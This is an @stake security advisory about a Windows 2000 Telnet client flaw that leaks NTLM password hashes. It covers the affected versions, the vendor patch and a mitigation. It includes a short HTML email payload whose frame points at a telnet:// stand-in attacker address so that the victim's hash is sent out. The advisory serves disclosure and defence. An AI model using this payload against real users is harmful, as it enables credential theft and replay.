Reported September 14, 2000 by
@stake

VERSIONS AFFECTED
  • Windows 2000 Telnet Client (All versions of Windows 2000)

DESCRIPTION

Originally discovered by @stake Windows 2000 Telnet is vulnerable to NTLM password capturing, cracking and replaying. 

By default NTLM Authentication is enabled on Microsoft Windows 2000 telnet clients and regardless of the server answering, Windows 2000 will first attempt to authenticate using NTLM.  As learned in the past with Windows NT 4.0, NTLM is vulnerable to password cracking attacks.

DEMONSTRATION

This can be exploited in a number or ways.  The easiest and probably most documented way to exploit this is by sending a specially crafted email to the target forcing their Telnet client to attempt to authenticate thus sending the NTLM hash to a specified location.

The following HTML could be inserted into an email to accomplish this;  

      <html>
      <frameset rows="100%,*">
      <frame src=about:blank>
      <frame src=telnet://evil.ip.address:port>
      </frameset>
      </html>
     

Once the target opens the email using either Microsoft Outlook, Outlook Express, Internet Explorer, Netscape Navigator, or Netscape Messenger the built in Telnet Client will attempt to authenticate to the specified IP address and port.

Once the Telnet client sends the NTLM authentication packet the attacker can simply crack the hashes and obtain a working username and password.  Or, an attacker may replay the NTLM hash and use it to authenticate to network resources.

VENDOR RESPONSE

Microsoft is very aware of this issue and has been working with @Stake for quite some time on patching the issue.  A Microsoft Security Bulletin is available at; 

 http://www.microsoft.com/technet/security/bulletin/MS00-067.asp

Microsoft has also released a patch that is available at; 

 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24319

@Stake has also released proof of concept code that can be downloaded from their web site.

It is also possible to defend against this issue by simply disabling NTLM authentication on Windows 2000 Telnet clients.  This is done by launching a command prompt and typing "unset NTLM" then exiting the Telnet client to save all changes.

CREDIT
Discovered by @stake